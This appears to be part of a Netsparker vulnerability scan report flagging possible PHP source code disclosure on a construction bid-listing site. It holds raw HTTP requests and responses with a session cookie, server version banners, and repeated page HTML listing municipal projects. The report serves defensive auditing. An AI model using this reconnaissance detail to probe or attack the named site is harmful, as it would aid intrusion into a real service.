onclick="ShowViewResults('1342806')">New Pump Station No. 2 & Pipeline Installation - Warren Water District (#1342806)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">New Pump Station No. 2 & Pipeline Installation - Warren Water District (#1342806)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">10/18/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1343309')">Water Service to Bowling Green & Wellsville: Water Distribution System (#1343309)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">Water Service to Bowling Green & Wellsville: Water Distribution System (#1343309)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">10/26/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1351825')">SCWD - Phase 2 North Burleigh WTP Equipment Installation, Contract 2010-6 (#1351825)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" ..
[Possible] PHP Source Code Disclosure
[Possible] PHP Source Code Disclosure
3
TOTAL
MEDIUM
Netsparker identified a web page that discloses PHP (server side) source code. An attacker can obtain server side source code of web application, which can contain sensitive data such as database connection strings, usernames and passwords along with the technical and business logic of the application.
Impact
Depending on the source code, database connection strings, username and passwords, internal workings and business logic of application can be revealed. With such information an attacker can mount the following types of attacks:
- Access the database or other data resources. Depending on the privileges of the account obtained from source code, it may be possible to read, update or delete arbitrary data from the database.
- Gain access to password protected administrative mechanisms such as dashboards, management consoles and admin panels, hence gaining full control of the application.
- Develop further attacks by investigating the source code for input validation errors and logic vulnerabilities.
Actions to Take
- Where the file is not required delete it form the server, where such files are required ensure that its permissions prevent users from accessing it via the web server.
- Ensure that the web server security patches are up to date and the latest stable version of the web server software is in use.
- Remove all temporary and backup files from the server.
Required skills for successful exploitation
This is dependent on the information obtained from source code. Uncovering these forms of vulnerabilities does not require high levels of skills. However a highly skilled attacker could leverage this form of vulnerability to obtain account information for databases or administrative panels, ultimately leading to control of the application or even the host the application reside on.
External References
|
- /qap/projects/prj_browse/ipp_prj_view.html
/qap/projects/prj_browse/ipp_prj_view.html |
Request
GET /qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=11&provider=765295 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:01:22 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:22 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 21167
Content-Type: text/html;charset=utf-8
<script language="javascript1.1">function DownloadBidTab(sjobNbr){ req_window = window.open ("/qap/projects/prj_browse/prj_download_bid_tab.html?job_no=" + sjobNbr,"","height=300,width=500");}function ShowViewResults(jobPK){ var w = window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&viewOnly=TRUE&group=11&provider=765295&jobPK=' + jobPK, 'ViewResults', 'status,resizable,scrollbars,width=700,height=600'); w.focus();}function PrintPage(){ window.print();}</script><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=11&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> </table> </td></tr><tr> <td width="100%" height="100%"> <table width="100%" height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="results_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="10"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="40"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="170"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">06/30/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1216224')">Shawnee County Project S-841001.00 - E. 6th Street Concrete Pavement Joint Repair (#1216224)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">Shawnee County Project S-841001.00 - E. 6th Street Concrete Pavement Joint Repair (#1216224)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">07/08/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1220929')">PWSD No. 1 Lafayette County, Mo - Contract 2: Transmission Line (#1220929)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">PWSD No. 1 Lafayette County, Mo - Contract 2: Transmission Line (#1220929)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">07/09/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1216287')">City of Topeka - Southwest Interceptor Sewer Project No. T-401009-00 (HTE No. 409650) (#1216287)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">City of Topeka - Southwest Interceptor Sewer Project No. T-401009-00 (HTE No. 409650) (#1216287)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">07/13/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1239802')">Standing Rock Rural Water System: Raw Water Pipeline Phase 2, Contract 3-4 (#1239802)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">Standing Rock Rural Water System: Raw Water Pipeline Phase 2, Contract 3-4 (#1239802)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">07/28/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1247812')">Standing Rock Rural Water System: Facility Removal & Restoration Project (#1247812)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">Standing Rock Rural Water System: Facility Removal & Restoration Project (#1247812)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">08/02/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1267448')">City of Oak Grove, Mo: SE 4th Street Improvements Project No. 2010-05 (#1267448)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">City of Oak Grove, Mo: SE 4th Street Improvements Project No. 2010-05 (#1267448)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">08/19/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1263009')">OMND Regional Service Area, OMND WTP Building & Equipment Installation, Contract 3-1D (#1263009)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">OMND Regional Service Area, OMND WTP Building & Equipment Installation, Contract 3-1D (#1263009)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">08/25/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1282800')">City of Oak Grove: SW 12th St/Curs - Street, Water & Storm Sewer Improvements Project No. 2010-04 (#1282800)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">City of Oak Grove: SW 12th St/Curs - Street, Water & Storm Sewer Improvements Project No. 2010-04 (#1282800)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">08/25/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1282789')">City of Oak Grove: SW 5th Street - Street, Water & Storm Sewer Improvements Project No. 2009-02 (#1282789)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">City of Oak Grove: SW 5th Street - Street, Water & Storm Sewer Improvements Project No. 2009-02 (#1282789)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">08/30/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1290346')">Pottawatomie County, KS: Roadway Improvement Project 14658-101, Green Valley Road (#1290346)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">Pottawatomie County, KS: Roadway Improvement Project 14658-101, Green Valley Road (#1290346)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">09/16/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1300647')">SCWD - Emmons County WTP Building and Equipment Installation Contract 2010-7 (#1300647)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">SCWD - Emmons County WTP Building and Equipment Installation Contract 2010-7 (#1300647)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">10/07/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1334336')">2010 Sanitary Sewer Rehabilitation Project - St. Charles, Iowa (#1334336)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">2010 Sanitary Sewer Rehabilitation Project - St. Charles, Iowa (#1334336)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">10/14/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1342806')">New Pump Station No. 2 & Pipeline Installation - Warren Water District (#1342806)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">New Pump Station No. 2 & Pipeline Installation - Warren Water District (#1342806)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">10/18/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1343309')">Water Service to Bowling Green & Wellsville: Water Distribution System (#1343309)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">Water Service to Bowling Green & Wellsville: Water Distribution System (#1343309)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">10/26/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1351825')">SCWD - Phase 2 North Burleigh WTP Equipment Installation, Contract 2010-6 (#1351825)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" ..
Date: Tue, 01 Mar 2011 20:01:22 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:22 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 21167
Content-Type: text/html;charset=utf-8
<script language="javascript1.1">function DownloadBidTab(sjobNbr){ req_window = window.open ("/qap/projects/prj_browse/prj_download_bid_tab.html?job_no=" + sjobNbr,"","height=300,width=500");}function ShowViewResults(jobPK){ var w = window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&viewOnly=TRUE&group=11&provider=765295&jobPK=' + jobPK, 'ViewResults', 'status,resizable,scrollbars,width=700,height=600'); w.focus();}function PrintPage(){ window.print();}</script><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=11&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> </table> </td></tr><tr> <td width="100%" height="100%"> <table width="100%" height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="results_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="10"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="40"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="170"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">06/30/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1216224')">Shawnee County Project S-841001.00 - E. 6th Street Concrete Pavement Joint Repair (#1216224)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">Shawnee County Project S-841001.00 - E. 6th Street Concrete Pavement Joint Repair (#1216224)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">07/08/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1220929')">PWSD No. 1 Lafayette County, Mo - Contract 2: Transmission Line (#1220929)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">PWSD No. 1 Lafayette County, Mo - Contract 2: Transmission Line (#1220929)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">07/09/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1216287')">City of Topeka - Southwest Interceptor Sewer Project No. T-401009-00 (HTE No. 409650) (#1216287)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">City of Topeka - Southwest Interceptor Sewer Project No. T-401009-00 (HTE No. 409650) (#1216287)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">07/13/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1239802')">Standing Rock Rural Water System: Raw Water Pipeline Phase 2, Contract 3-4 (#1239802)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">Standing Rock Rural Water System: Raw Water Pipeline Phase 2, Contract 3-4 (#1239802)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">07/28/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1247812')">Standing Rock Rural Water System: Facility Removal & Restoration Project (#1247812)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">Standing Rock Rural Water System: Facility Removal & Restoration Project (#1247812)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">08/02/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1267448')">City of Oak Grove, Mo: SE 4th Street Improvements Project No. 2010-05 (#1267448)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">City of Oak Grove, Mo: SE 4th Street Improvements Project No. 2010-05 (#1267448)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">08/19/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1263009')">OMND Regional Service Area, OMND WTP Building & Equipment Installation, Contract 3-1D (#1263009)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">OMND Regional Service Area, OMND WTP Building & Equipment Installation, Contract 3-1D (#1263009)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">08/25/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1282800')">City of Oak Grove: SW 12th St/Curs - Street, Water & Storm Sewer Improvements Project No. 2010-04 (#1282800)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">City of Oak Grove: SW 12th St/Curs - Street, Water & Storm Sewer Improvements Project No. 2010-04 (#1282800)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">08/25/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1282789')">City of Oak Grove: SW 5th Street - Street, Water & Storm Sewer Improvements Project No. 2009-02 (#1282789)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">City of Oak Grove: SW 5th Street - Street, Water & Storm Sewer Improvements Project No. 2009-02 (#1282789)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">08/30/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1290346')">Pottawatomie County, KS: Roadway Improvement Project 14658-101, Green Valley Road (#1290346)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">Pottawatomie County, KS: Roadway Improvement Project 14658-101, Green Valley Road (#1290346)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">09/16/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1300647')">SCWD - Emmons County WTP Building and Equipment Installation Contract 2010-7 (#1300647)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">SCWD - Emmons County WTP Building and Equipment Installation Contract 2010-7 (#1300647)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">10/07/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1334336')">2010 Sanitary Sewer Rehabilitation Project - St. Charles, Iowa (#1334336)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">2010 Sanitary Sewer Rehabilitation Project - St. Charles, Iowa (#1334336)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">10/14/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1342806')">New Pump Station No. 2 & Pipeline Installation - Warren Water District (#1342806)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">New Pump Station No. 2 & Pipeline Installation - Warren Water District (#1342806)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">10/18/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1343309')">Water Service to Bowling Green & Wellsville: Water Distribution System (#1343309)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" group="<?p:group?>" provider="<?p:provider?>" __>">Water Service to Bowling Green & Wellsville: Water Distribution System (#1343309)</a><div></td--> </tr> <tr height="15"> <td colspan="3"></td> </tr> <tr> <td width="10"></td> <td valign="top" width="40"><span class="prj_bid_date">10/26/2010</span></td> <td valign="top" width="170"><div class="prj_title"><a href="#" onclick="ShowViewResults('1351825')">SCWD - Phase 2 North Burleigh WTP Equipment Installation, Contract 2010-6 (#1351825)</a></div></td> <!--td valign="top" width="170"><div class="prj_title"><a href="<!__#SMARTLINK page="projects/prj_browse/ipp_prj_view.html" ShowProjectDetails="TRUE" jobPK="<?r:Projects:1?>" ..
|
- /qap/projects/prj_browse/ipp_login.html
/qap/projects/prj_browse/ipp_login.html |
Request
GET /qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&provider=453856&jobNo=1438657&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params= HTTP/1.1
Referer: http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/action/IPPshowProjData?jobCategoryNo=1048445&group=11&provider=453856&sortType=0&jobNo=1438657
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:01:24 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:24 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 3637
Content-Type: text/html;charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Topeka - Projects</title><script type="text/javascript"><!-- function doDownload() { doLogin(); } function doLogin() { document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=1048445&member_no=&provider=453856&jobNo=1438657&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); } function doPlanHolders() { //window.open('/qap/projects/prj_add_mod/prj_plan_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/planholder/planholder_list.html?modifiable=FALSE&jobPK=1438657', '', 'height=650,width=1100,scrollbars,resizable'); } function confirmPlanDl() { document.location ='/qap/projects/prj_browse/prj_b_dlconf.html?member_no=&job_no=1438657&download_type=plan', '', 'height=300,width=500,scrollbars,resizable'; } function ShowProjectPreview(action) { 